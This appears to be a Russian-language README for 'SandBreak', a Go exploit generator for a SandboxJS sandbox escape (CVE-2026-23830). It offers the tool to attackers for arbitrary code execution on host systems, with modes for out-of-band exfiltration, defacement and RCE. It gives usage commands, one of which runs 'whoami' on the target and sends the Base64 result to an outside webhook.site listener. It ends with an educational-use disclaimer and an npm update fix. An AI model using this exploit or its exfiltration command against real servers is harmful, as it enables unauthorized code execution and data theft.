
Генерирует и доставляет эксплойт-пейлоады для CVE-2026-23830, обхода песочницы SandboxJS, с режимами для слепой внеполосной (OOB) эксфильтрации и локального PoC с calc. Поддерживает HTTP/HTTPS-прослушиватели и создаёт минифицированные JavaScript-пейлоады.
SandBreak — это надёжный генератор эксплойтов на Go, предназначенный для использования уязвимости SandboxJS Escape (CVE-2026-23830).
Этот инструмент эксплуатирует незащищённый конструктор AsyncFunction в старых версиях sandboxjs, позволяя злоумышленникам выйти за пределы песочницы V8 и выполнить произвольный код на хост-системе. Он поддерживает несколько режимов полезной нагрузки, включая Blind OOB Exfiltration, Defacement и Error-Based RCE.
oob: Внеполосная эксфильтрация данных (HTTP/HTTPS) для слепых сценариев.calc: Запускает calc.exe (классический PoC).Клонируйте репозиторий и запустите:
git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go
go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
Используйте его, когда у вас нет обратной связи по выводу. Он выполняет команду и отправляет результат в кодировке Base64 на ваш слушатель (например, webhook.site).
go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
Успешно обходит базовые сбои фильтрации исходящего трафика, обрабатывая сетевые ошибки.
Запускает калькулятор на сервере Windows.
go run CVE-2026-23830.go -mode calc
Атакующий получает данные пользователя сервера через Webhook, несмотря на отсутствие визуального вывода на сайте.
Этот инструмент создан только для образовательных целей и авторизованного тестирования на проникновение.
Обновите sandboxjs до последней версии, в которой конструктор AsyncFunction должным образом изолирован в песочнице.
npm update sandboxjs
Автор: Meysam Bal-afkan
Лицензия: MIT